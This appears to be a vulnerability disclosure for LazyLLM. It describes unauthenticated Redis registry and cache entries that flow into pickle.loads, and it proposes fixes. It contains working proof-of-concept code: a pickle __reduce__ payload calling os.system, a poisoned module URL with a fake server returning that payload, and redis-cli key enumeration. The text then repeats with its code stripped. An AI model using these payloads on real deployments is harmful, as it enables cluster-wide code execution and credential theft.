Unauthenticated Distributed Control Plane Allows Cluster-Wide Code Execution via Redis Service Registry Poisoning in LazyLLM
Summary
LazyLLM (LazyAGI/LazyLLM, 3.7k stars) uses Redis as an unauthenticated distributed control plane for module service discovery and result caching. An attacker with network access to the Redis instance can achieve Remote Code Execution on every LazyLLM worker in the deployment through two independent attack chains:
-
Service Registry Poisoning — Module URLs are stored in Redis without authentication or integrity verification. An attacker overwrites a module's registered URL, redirecting all inter-module communication to an attacker-controlled server. The calling module deserializes the response with pickle.loads() — a function that executes arbitrary code during deserialization. The _call() code path lacks the Security-Key header protection that forward() implements, meaning the attacker's server receives trusted requests without authentication.
-
Cache Poisoning — Module execution results are cached in Redis via pickle.dumps() and read back via pickle.loads(). An attacker writes a malicious serialized payload to a predictable cache key. Any worker that reads from cache executes the payload.
Both chains require only network adjacency to the Redis instance. Default LazyLLM deployments use redis://host:6379 without authentication, TLS, or integrity verification. No warnings are emitted when connecting without credentials.
Framing
This report is not "pickle can execute code." That is well-known and would correctly be triaged as low-novelty.
This report is: network-originated authority is fed into pickle without authentication or integrity controls.
Specifically:
- The bytes deserialized originate from Redis (network).
- Redis content is treated as an authoritative module registry and authoritative response cache (trust).
- The
_call() path consumes registry-resolved URLs without Security-Key enforcement, while forward() does enforce it (auth asymmetry — internal inconsistency in LazyLLM's own threat model).
- The returned bytes flow directly into
pickle.loads() (sink).
The defect is the storage / execution boundary collapse between the distributed control plane and the worker execution context. Pickle is the mechanism. The vulnerability is the missing authentication of the authority that selects what gets unpickled.
Architecture: How LazyLLM Uses Redis
┌─────────────┐ ┌─────────────────────┐ ┌─────────────┐
│ Module A │────▶│ Redis (no auth) │◀────│ Module B │
│ (worker) │ │ │ │ (worker) │
│ │ │ url:module_B = ... │ │ │
│ 1. lookup │ │ cache:key = ... │ │ │
│ URL for │ │ │ │ │
│ module B │ └─────────────────────┘ └─────────────┘
│ │ ▲
│ 2. call │ │
│ module B │ ┌─────────┴───────────┐
│ at URL │ │ ATTACKER │
│ │ │ │
│ 3. pickle. │ │ Overwrites: │
│ loads() │ │ • url:module_B │
│ response │ │ → evil server │
└──────────────┘ │ • cache:key │
│ │ → pickle payload │
▼ └─────────────────────┘
RCE on A
(propagates to all workers reading cache or calling modules)
key architectural facts:
- Redis is the sole service discovery mechanism (
servermodule.py:180-181)
- Redis is the sole cache backend when configured (
module.py:170-177)
- No authentication is required or warned about (
redis_client.py:12)
- No TLS/integrity/HMAC on stored data
- Cache keys follow predictable pattern:
module@{key}:{hash_key}
- Module URL keys follow predictable pattern:
url:{module_id}
Affected Component
CVSS
9.8 Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- AV:N — Redis is network-accessible in standard deployments (docker-compose, k8s pod networks, VPC)
- AC:L — No race conditions, no complex prerequisites
- PR:N — Redis default: no authentication
- UI:N — Fully automated exploitation
- S:U— Scope unchanged (execution within LazyLLM worker context)
- C:H/I:H/A:H — Full code execution on every worker
Note: If triager argues Redis requires network adjacency, AV:A reduces to 8.8. The finding remains Critical regardless.
CWE
- CWE-502: Deserialization of Untrusted Data
- CWE-306: Missing Authentication for Critical Function (Redis service registry)
- CWE-345: Insufficient Verification of Data Authenticity (no HMAC/signature on cached data)
Chain 1: Service Registry Poisoning → Module Impersonation → RCE
Step 1: URL stored in Redis without authentication
# servermodule.py:209-213
def _set_url(self, url):
if _redis_client:
redis_client['url'].set(self._url_id, url) # No auth, no HMAC
self._url_wrapper.url = url
Step 2: URL read from Redis without validation
# servermodule.py:200-201
url = redis_client['url'].get(self._url_id)
self._url_wrapper.url = url.decode('utf-8') if url else None # Trusts Redis blindly
Step 3: _call() sends request to URL WITHOUT Security-Key
# servermodule.py:418-428
def _call(self, fname, *args, **kwargs):
args, kwargs = lazyllm.dump_obj(args), lazyllm.dump_obj(kwargs)
url = urljoin(self._url.rsplit('/', 1)[0], '_call')
r = requests.post(url, json=(fname, args, kwargs), ...) # NO Security-Key header
...
return pickle.loads(codecs.decode(r.content, 'base64')) # RCE
Critical access control gap: forward() (line 430-435) sends a Security-Key header. _call() (line 418-428) does not. An attacker's impersonation server receives the request without needing to know the security key.
Step 4: Streaming variant
# servermodule.py:264-266
def _decode_line(self, line: bytes):
return pickle.loads(codecs.decode(line, 'base64')) # Every streaming line deserialized
Chain 2: Cache Poisoning → RCE
# module.py:163-178
class _RedisCacheStrategy(_CacheStorageStrategy):
def get(self, key: str, hash_key: str):
redis_key = self._get_redis_key(key, hash_key)
value = self._client.get(redis_key)
if value is None:
raise CacheNotFoundError(...)
return pickle.loads(value) # Deserializes Redis data directly — RCE
Key predictability: Cache keys follow module@{key}:{hash_key}. URL keys follow url:{module_id}. Both prefixes are enumerable via KEYS * on unauthenticated Redis.
Insecure-by-Default Evidence
No authentication, no warning
# redis_client.py:4-14
lazyllm.config.add('redis_url', str, '', 'REDIS_URL',
description='The URL of the Redis server.') # No auth guidance
_redis_url = lazyllm.config['redis_url']
if _redis_url:
_redis_client = redis.Redis.from_url(_redis_url) # No auth params, no TLS
assert _redis_client.ping(), (
'Found reids config but can not connect, ...') # Note: typo "reids" — unreviewed code path
redis.Redis.from_url() called with raw URL — no password, ssl, ssl_cert_reqs parameters
- Config description is only
"The URL of the Redis server." — zero guidance on authentication
- No startup warning when connecting without credentials
- No documentation of auth requirements anywhere in the repository (zero Redis security mentions across
docs/en/, docs/zh/, README.md, README.CN.md)
- No docker-compose, k8s manifest, or deployment guide exists in the repository — operators receive no deployment security guidance
- The only deployment parameter is the environment variable
LAZYLLM_REDIS_URL=redis://host:6379
- The standard
redis:// scheme does not encode authentication; operators must know to use redis://:password@host:6379 or rediss:// (TLS) — neither is mentioned anywhere
Additional pickle-from-Redis chains (not required for this report, but demonstrates systemic pattern)
Globals subsystem (globals.py:259-264):
# globals.py:259,263 — RedisGlobals reads/writes global state via Redis
self._redis_client.set(self._get_redis_key(key), obj2str(self._data)) # obj2str = pickle.dumps + base64
self._data.update(str2obj(self._redis_client.get(...))) # str2obj = base64 + pickle.loads
Queue subsystem (queue.py:419-434): RedisQueue also uses redis.Redis.from_url() without authentication for task distribution.
These additional chains demonstrate that Redis-backed pickle deserialization is not isolated to caching — it is a systemic architectural pattern throughout LazyLLM's distributed coordination layer.
Distinct from Issue #764
|
Issue #764 (Sep 2025) |
This submission (V178) |
| File |
relay/server.py |
module.py + servermodule.py |
| Sink |
cloudpickle.loads via CLI |
pickle.loads via Redis + HTTP |
| Entry point |
Local RelayServer args |
Network (Redis + HTTP) |
| Trust boundary |
CLI → local process |
Redis (network) → all workers |
| Scope |
Single process |
Cluster-wide propagation |
| Access control |
N/A |
_call() missing Security-Key |
Proof of Concept
Prerequisites
pip install lazyllm redis
docker run -d -p 6379:6379 redis:7-alpine # Unauthenticated Redis
export LAZYLLM_REDIS_URL=redis://localhost:6379
PoC 1: Cache Poisoning → Single Worker RCE
"""Demonstrates RCE via cache poisoning. Non-destructive: writes marker file."""
import pickle, redis, os
class RCEPayload:
def __reduce__(self):
return (os.system, ("echo SPRK3-V178-CACHE-RCE > /tmp/sprk3_v178_cache",))
r = redis.Redis.from_url(os.environ.get("LAZYLLM_REDIS_URL", "redis://localhost:6379"))
r.set("module@target_module:default_hash", pickle.dumps(RCEPayload()))
from lazyllm.module.module import _RedisCacheStrategy
cache = _RedisCacheStrategy()
try:
cache.get("target_module", "default_hash")
except Exception:
pass
assert os.path.exists("/tmp/sprk3_v178_cache"), "RCE failed"
print("[+] Cache poisoning RCE confirmed")
os.remove("/tmp/sprk3_v178_cache")
PoC 2: Service Registry Poisoning → Cross-Process RCE
"""
Demonstrates cluster-wide RCE via service registry poisoning.
Process A: Attacker poisons Redis URL entry + runs fake HTTP server
Process B: Legitimate LazyLLM worker calls module → gets redirected → RCE
Sink fires through library: ServerModule._call() → servermodule.py:428
Run in two terminals:
Terminal 1: python3 poc_v178_registry_poison.py --attacker
Terminal 2: python3 poc_v178_registry_poison.py --victim
"""
import pickle, redis, os, sys, codecs, json
from http.server import HTTPServer, BaseHTTPRequestHandler
REDIS_URL = os.environ.get("LAZYLLM_REDIS_URL", "redis://localhost:6379")
EVIL_PORT = 18999
MARKER = "/tmp/sprk3_v178_registry"
TARGET_MODULE_ID = "victim_module_001"
class RCEPayload:
def __reduce__(self):
return (os.system, (f"echo SPRK3-V178-REGISTRY-RCE-$(date +%s) > {MARKER}",))
class EvilHandler(BaseHTTPRequestHandler):
"""Responds to _call() with a pickle RCE payload."""
def do_POST(self):
payload = codecs.encode(pickle.dumps(RCEPayload()), 'base64')
self.send_response(200)
self.send_header('Content-Type', 'application/octet-stream')
self.end_headers()
self.wfile.write(payload)
def log_message(self, *args): pass
if '--attacker' in sys.argv:
r = redis.Redis.from_url(REDIS_URL)
# Poison the URL registry — redirect victim_module to our evil server
r.set(f"url:{TARGET_MODULE_ID}", f"http://127.0.0.1:{EVIL_PORT}/forward")
print(f"[+] Poisoned url:{TARGET_MODULE_ID} → http://127.0.0.1:{EVIL_PORT}")
print(f"[+] Starting evil HTTP server on :{EVIL_PORT}")
HTTPServer(('0.0.0.0', EVIL_PORT), EvilHandler).serve_forever()
elif '--victim' in sys.argv:
# Resolve poisoned URL from Redis (servermodule.py:200-201)
r = redis.Redis.from_url(REDIS_URL)
url = r.get(f"url:{TARGET_MODULE_ID}")
if url:
url = url.decode('utf-8')
print(f"[*] Resolved module URL from Redis: {url}")
# Construct ServerModule with the poisoned URL and call via library
# ServerModule._call() at servermodule.py:418-428:
# - POSTs to urljoin(url, '_call') WITHOUT Security-Key
# - Deserializes via pickle.loads(codecs.decode(r.content, 'base64'))
from lazyllm.module.servermodule import ServerModule
sm = ServerModule(url=url)
try:
result = sm._call('run') # Sink fires through library — line 428
except Exception:
pass # RCE fires during deserialization; post-deser exceptions expected
if os.path.exists(MARKER):
print(f"[+] CROSS-PROCESS RCE CONFIRMED: {open(MARKER).read().strip()}")
print(f" Sink: servermodule.py:428 pickle.loads (library-imported)")
os.remove(MARKER)
else:
print("[-] RCE marker not found")
else:
print("Usage: --attacker (terminal 1) or --victim (terminal 2)")
PoC 3: Key Enumeration
# All module URLs and cache entries are enumerable
redis-cli -h <target> KEYS "url:*"
redis-cli -h <target> KEYS "module@*"
# Returns every registered module and cached result in the cluster
Impact
Cluster-wide propagation: LazyLLM is designed for multi-agent LLM deployments where multiple modules communicate via Redis-stored URLs. Compromising Redis gives the attacker:
- Service impersonation — redirect any module's traffic to an attacker-controlled endpoint
- Cache poisoning — inject malicious payloads that execute on any worker reading from cache
- Lateral movement — RCE on one worker → poison Redis → RCE on every other worker
- Persistence — poisoned cache entries survive worker restarts
The access control gap amplifies this: _call() does not send Security-Key, so the attacker's impersonation server receives trusted inter-module calls without needing any credentials. This is not "pickle is dangerous" — this is an unauthenticated distributed control plane with no integrity verification on any data path.
Why This Matters in AI Infrastructure
LazyLLM is not a generic web service. It orchestrates autonomous agent and tool pipelines. Worker processes that consume Redis-distributed authority routinely handle:
- API keys and provider credentials (OpenAI, Anthropic, HuggingFace, cloud)
- Embedding stores and proprietary model artifacts
- Agent tool invocations with filesystem, shell, and network reach
- Downstream MCP / toolchain integrations that inherit worker trust
A single Redis write does not merely execute code on one node. It compromises the trust root of every agent the cluster serves: every tool call, every credential lookup, every downstream MCP server now runs under attacker authority. This is not "Python RCE" — it is autonomous-agent cluster takeover.
Anticipated Defenses
"Redis exposure is operator responsibility"
The vulnerability is not that Redis can be exposed. The vulnerability is that LazyLLM treats Redis contents as trusted executable authority without cryptographic verification — and does so silently, by default, with no warning to operators.
Even when Redis is intentionally internal-only, the contents of Redis become a code-execution oracle reachable through every adjacent compromise:
- SSRF in any worker-side HTTP handler that can reach Redis
- Compromised sidecar or co-tenant in the same VPC / k8s namespace
- Stolen Redis credentials — or no credentials at all, since LazyLLM's default deployment uses none
- One poisoned worker writing back to the registry (lateral propagation)
- Intra-cluster lateral movement originating from any unrelated CVE in the same trust zone
In every case, a write primitive against an "internal" Redis instance converts into cluster-wide RCE. The architectural defect is that the entire trust model of the cluster collapses to the integrity of one unauthenticated KV store.
Operators cannot fix this with network policy alone — network controls cannot defend against SSRF, sidecar compromise, or insider write primitives. Only the application can fix it, by authenticating the contents of Redis (signed cache values, verified registry entries), not merely its transport.
Public precedent for this class of dismissal failing: CVE-2026-41940 (cPanel/WHM) demonstrated that "trusted environment" vendor defenses are invalid once any adjacent primitive is reachable.
"Pickle is expected / trusted internal serialization"
The deserialization sink does not consume operator-supplied bytes. It consumes bytes selected by a network-resolved lookup against an unauthenticated KV store. The trust boundary is between the Redis-stored authority and the worker, not between the operator and the worker. See Framing section above.
CVSS scoring contention
A triager may argue for AV:A instead of AV:N, citing that Redis is typically internal-only. The finding remains Critical at AV:A (CVSS 8.8). However, AV:N is justified because:
- LazyLLM emits no warning when connecting to an unauthenticated Redis
- LazyLLM emits no warning when
LAZYLLM_REDIS_URL is set to a public-routable address
- The PyPI-installable package does not require any network-isolation step before exposing Redis on
0.0.0.0:6379
- Default
docker run -d -p 6379:6379 redis:7-alpine from LazyLLM's own deployment pattern publishes Redis to all host interfaces
Whether AV:N or AV:A, the structural defect — unauthenticated network-originated bytes flowing into pickle — is unchanged.
Remediation
- Replace pickle with safe serialization — use
json or msgpack for cache values and HTTP responses. If pickle is required, use RestrictedUnpickler with a strict allowlist.
- Require Redis authentication — enforce
requirepass or ACLs. Emit a startup WARNING when connecting without credentials. Document auth as mandatory, not optional.
- Sign cached data — HMAC cache values on write, verify on read. Prevents cache poisoning even if Redis is compromised.
- Add Security-Key to _call() —
_call() currently lacks the Security-Key header that forward() implements. Both code paths should enforce authentication.
- Validate registered URLs — verify module URLs against an allowlist or require mutual TLS for inter-module communication.
Timeline
- 2026-05-17: Vulnerability discovered by SPR{K}3 automated scanning (Ora nightly, Darwin-directed)
- 2026-05-25: Reported via GitHub issue (no private vulnerability reporting available)
Unauthenticated Distributed Control Plane Allows Cluster-Wide Code Execution via Redis Service Registry Poisoning in LazyLLM
Summary
LazyLLM (LazyAGI/LazyLLM, 3.7k stars) uses Redis as an unauthenticated distributed control plane for module service discovery and result caching. An attacker with network access to the Redis instance can achieve Remote Code Execution on every LazyLLM worker in the deployment through two independent attack chains:
Service Registry Poisoning — Module URLs are stored in Redis without authentication or integrity verification. An attacker overwrites a module's registered URL, redirecting all inter-module communication to an attacker-controlled server. The calling module deserializes the response with
pickle.loads()— a function that executes arbitrary code during deserialization. The_call()code path lacks theSecurity-Keyheader protection thatforward()implements, meaning the attacker's server receives trusted requests without authentication.Cache Poisoning — Module execution results are cached in Redis via
pickle.dumps()and read back viapickle.loads(). An attacker writes a malicious serialized payload to a predictable cache key. Any worker that reads from cache executes the payload.Both chains require only network adjacency to the Redis instance. Default LazyLLM deployments use
redis://host:6379without authentication, TLS, or integrity verification. No warnings are emitted when connecting without credentials.Framing
This report is not "pickle can execute code." That is well-known and would correctly be triaged as low-novelty.
This report is: network-originated authority is fed into pickle without authentication or integrity controls.
Specifically:
_call()path consumes registry-resolved URLs withoutSecurity-Keyenforcement, whileforward()does enforce it (auth asymmetry — internal inconsistency in LazyLLM's own threat model).pickle.loads()(sink).The defect is the storage / execution boundary collapse between the distributed control plane and the worker execution context. Pickle is the mechanism. The vulnerability is the missing authentication of the authority that selects what gets unpickled.
Architecture: How LazyLLM Uses Redis
key architectural facts:
servermodule.py:180-181)module.py:170-177)redis_client.py:12)module@{key}:{hash_key}url:{module_id}Affected Component
CVSS
9.8 Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Note: If triager argues Redis requires network adjacency, AV:A reduces to 8.8. The finding remains Critical regardless.
CWE
Chain 1: Service Registry Poisoning → Module Impersonation → RCE
Step 1: URL stored in Redis without authentication
Step 2: URL read from Redis without validation
Step 3: _call() sends request to URL WITHOUT Security-Key
Critical access control gap:
forward()(line 430-435) sends aSecurity-Keyheader._call()(line 418-428) does not. An attacker's impersonation server receives the request without needing to know the security key.Step 4: Streaming variant
Chain 2: Cache Poisoning → RCE
Key predictability: Cache keys follow
module@{key}:{hash_key}. URL keys followurl:{module_id}. Both prefixes are enumerable viaKEYS *on unauthenticated Redis.Insecure-by-Default Evidence
No authentication, no warning
redis.Redis.from_url()called with raw URL — nopassword,ssl,ssl_cert_reqsparameters"The URL of the Redis server."— zero guidance on authenticationdocs/en/,docs/zh/,README.md,README.CN.md)LAZYLLM_REDIS_URL=redis://host:6379redis://scheme does not encode authentication; operators must know to useredis://:password@host:6379orrediss://(TLS) — neither is mentioned anywhereAdditional pickle-from-Redis chains (not required for this report, but demonstrates systemic pattern)
Globals subsystem (
globals.py:259-264):Queue subsystem (
queue.py:419-434):RedisQueuealso usesredis.Redis.from_url()without authentication for task distribution.These additional chains demonstrate that Redis-backed pickle deserialization is not isolated to caching — it is a systemic architectural pattern throughout LazyLLM's distributed coordination layer.
Distinct from Issue #764
cloudpickle.loadsvia CLIpickle.loadsvia Redis + HTTP_call()missing Security-KeyProof of Concept
Prerequisites
PoC 1: Cache Poisoning → Single Worker RCE
PoC 2: Service Registry Poisoning → Cross-Process RCE
PoC 3: Key Enumeration
Impact
Cluster-wide propagation: LazyLLM is designed for multi-agent LLM deployments where multiple modules communicate via Redis-stored URLs. Compromising Redis gives the attacker:
The access control gap amplifies this:
_call()does not sendSecurity-Key, so the attacker's impersonation server receives trusted inter-module calls without needing any credentials. This is not "pickle is dangerous" — this is an unauthenticated distributed control plane with no integrity verification on any data path.Why This Matters in AI Infrastructure
LazyLLM is not a generic web service. It orchestrates autonomous agent and tool pipelines. Worker processes that consume Redis-distributed authority routinely handle:
A single Redis write does not merely execute code on one node. It compromises the trust root of every agent the cluster serves: every tool call, every credential lookup, every downstream MCP server now runs under attacker authority. This is not "Python RCE" — it is autonomous-agent cluster takeover.
Anticipated Defenses
"Redis exposure is operator responsibility"
The vulnerability is not that Redis can be exposed. The vulnerability is that LazyLLM treats Redis contents as trusted executable authority without cryptographic verification — and does so silently, by default, with no warning to operators.
Even when Redis is intentionally internal-only, the contents of Redis become a code-execution oracle reachable through every adjacent compromise:
In every case, a write primitive against an "internal" Redis instance converts into cluster-wide RCE. The architectural defect is that the entire trust model of the cluster collapses to the integrity of one unauthenticated KV store.
Operators cannot fix this with network policy alone — network controls cannot defend against SSRF, sidecar compromise, or insider write primitives. Only the application can fix it, by authenticating the contents of Redis (signed cache values, verified registry entries), not merely its transport.
Public precedent for this class of dismissal failing: CVE-2026-41940 (cPanel/WHM) demonstrated that "trusted environment" vendor defenses are invalid once any adjacent primitive is reachable.
"Pickle is expected / trusted internal serialization"
The deserialization sink does not consume operator-supplied bytes. It consumes bytes selected by a network-resolved lookup against an unauthenticated KV store. The trust boundary is between the Redis-stored authority and the worker, not between the operator and the worker. See Framing section above.
CVSS scoring contention
A triager may argue for AV:A instead of AV:N, citing that Redis is typically internal-only. The finding remains Critical at AV:A (CVSS 8.8). However, AV:N is justified because:
LAZYLLM_REDIS_URLis set to a public-routable address0.0.0.0:6379docker run -d -p 6379:6379 redis:7-alpinefrom LazyLLM's own deployment pattern publishes Redis to all host interfacesWhether AV:N or AV:A, the structural defect — unauthenticated network-originated bytes flowing into pickle — is unchanged.
Remediation
jsonormsgpackfor cache values and HTTP responses. If pickle is required, useRestrictedUnpicklerwith a strict allowlist.requirepassor ACLs. Emit a startup WARNING when connecting without credentials. Document auth as mandatory, not optional._call()currently lacks theSecurity-Keyheader thatforward()implements. Both code paths should enforce authentication.Timeline